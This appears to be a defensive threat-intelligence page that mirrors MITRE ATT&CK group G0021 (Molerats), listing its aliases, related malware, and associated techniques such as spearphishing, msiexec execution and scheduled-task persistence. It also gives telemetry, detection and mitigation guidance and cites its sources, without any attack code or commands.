G0021: Molerats
Analyst context for executives and security teams
Molerats is an ATT&CK-tracked intrusion set described by MITRE as an Arabic-speaking, politically motivated group operating since 2012, with reported victim geography primarily in the Middle East, Europe, and the United States. For defenders, the value of this object is less about a single signature and more about validating resilience against a recurring pattern: spearphishing-led access, user-assisted execution, Windows backdoors/RATs, persistence through scheduled tasks or Run keys, script execution, tool transfer, and credential theft from browsers.
Executive priority
Treat this as a practical test case for phishing resilience, endpoint visibility, and incident response readiness. Leaders should ask whether the organization can produce evidence that email security, endpoint logging, script controls, persistence monitoring, and credential protection would expose the ATT&CK behaviors associated with this group. Because the official ATT&CK group object has no detection text and no top-level platform list, prioritization should be based on local exposure: geographic relevance, politically sensitive business functions, executive or regional targeting risk, and the presence of Windows-heavy user endpoints where the related malware and techniques are most represented.
Technical view
SOC and IR teams should map coverage against the relationship set rather than relying on a Molerats-specific detection. The relationships include use of PoisonIvy, DustySky, Spark, SharpStage, DropBook, and MoleNet, all listed with Windows platforms, plus techniques spanning spearphishing links and attachments, malicious link/file execution, PowerShell, Visual Basic, JavaScript, msiexec proxy execution, scheduled tasks, Registry Run keys/startup folders, process discovery, ingress tool transfer, deobfuscation/decoding, compression, code signing abuse, and browser credential access. Validate whether detections correlate email events, user execution, child processes from Office/browser/script hosts, persistence writes, scheduled task creation, unusual msiexec activity, downloaded payloads, and browser credential store access into an investigation timeline.
Likely telemetry
- Email security logs for spearphishing attachments and links, including sender, recipient, URL, attachment, and delivery disposition metadata.
- Endpoint process creation telemetry for PowerShell, Visual Basic/JScript script hosts, msiexec.exe, archive/decompression utilities, and suspicious child processes from Office applications or browsers.
- Windows scheduled task creation/modification events and command-line details where available.
- Windows Registry and startup folder monitoring for Run key or startup persistence changes.
- File creation and download telemetry for transferred tools, compressed files, decoded payloads, PyInstaller/.NET artifacts where observable, and signed binaries with unusual context.
Detection direction
- Build behavior-led analytics around the ATT&CK relationships rather than a single group label; the official object does not provide detection guidance.
- Tune phishing detections to connect initial email delivery with endpoint execution from attachments or links, especially when followed by script interpreters, msiexec, downloads, or persistence creation.
- Validate command-line and parent/child-process visibility for PowerShell, Visual Basic/JScript, msiexec.exe, and archive/decode activity; lack of command-line logging is a material blind spot.
- Monitor scheduled task and Run key creation in user context, but account for legitimate software installers and administrative tools to reduce false positives.
- Review code-signing trust logic: a signed binary should not be treated as benign without execution context, source path, signer reputation, and behavior.
Mitigation priorities
- Prioritize phishing controls and user-reporting workflows for attachments and links, since both spearphishing attachment and spearphishing link are associated techniques.
- Harden endpoint execution paths: restrict or monitor script interpreters, PowerShell, and msiexec usage according to business need, with emphasis on high-risk users and regions.
- Strengthen persistence prevention and monitoring for scheduled tasks, Registry Run keys, and startup folders on Windows endpoints.
- Reduce credential exposure by managing browser password storage risk, enforcing strong identity controls, and ensuring rapid credential reset procedures during IR.
- Ensure EDR, email, proxy/DNS, and identity logs are retained long enough to reconstruct the sequence from email delivery to execution, persistence, tool transfer, and credential access.
Analyst notes and limits
The ATT&CK object identifies Molerats aliases as Molerats, Operation Molerats, and Gaza Cybergang, and cites reporting from ClearSky, FireEye, Kaspersky, and Cybereason. Relationship context is especially useful here because the group object has no official detection field and no top-level tactics or platforms. The strongest defensible defensive takeaway is to assess coverage for the related techniques and Windows malware relationships, while keeping geographic and political targeting context as a risk-prioritization input rather than proof of exposure.
This take is limited to the supplied ATT&CK STIX fields, external references, and relationships. It does not assert current activity, customer targeting, confirmed compromise, or guaranteed detection. Top-level platforms and tactics are not specified for the intrusion-set object; platform references come only from related software and technique objects. Local environment telemetry, asset exposure, business geography, and control configuration are required to determine actual risk and coverage.
Molerats
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1218.007 | Msiexec Sub-technique | Molerats has used msiexec.exe to execute an MSI payload.CitationUnit42 Molerat Mar 2020 |
| Enterprise | T1204.001 | Malicious Link Sub-technique | |
| Enterprise | T1105 | Ingress Tool Transfer | |
| Enterprise | T1553.002 | Code Signing Sub-technique | |
| Enterprise | T1027.015 | Compression Sub-technique | |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | Molerats has created scheduled tasks to persistently run VBScripts.CitationUnit42 Molerat Mar 2020 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | |
| Enterprise | T1057 | Process Discovery | |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | |
| Enterprise | T1555.003 | Credentials from Web Browsers Sub-technique | |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | |
| Enterprise | T1059.001 | PowerShell Sub-technique | |
| Enterprise | T1059.005 | Visual Basic Sub-technique | |
| Enterprise | T1059.007 | JavaScript Sub-technique | |
| Enterprise | T1204.002 | Malicious File Sub-technique |
Groups, software, and campaigns
S0553: MoleNet
S0543: Spark
S0062: DustySky
S0547: DropBook
S0546: SharpStage
SharpStage is a .NET malware with backdoor capabilities.[1][2]
S0012: PoisonIvy
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 2.1 | Current bundle | 096dac19e8b2… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
DustySky
ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.
Open source URL -
[2]
DustySky2
ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.
Open source URL -
[3]
Kaspersky MoleRATs April 2019
GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020.
Open source URL -
[4]
Cybereason Molerats Dec 2020
Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020.
Open source URL -
[5]
FireEye Operation Molerats
Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved November 17, 2024.
Open source URL -
[6]
Gaza Cybergang
(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)(Citation: Cybereason Molerats Dec 2020)
-
[7]
Molerats
(Citation: DustySky)
-
[8]
Operation Molerats
(Citation: FireEye Operation Molerats)(Citation: Cybereason Molerats Dec 2020)
-
[9]
mitre-attack G0021Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.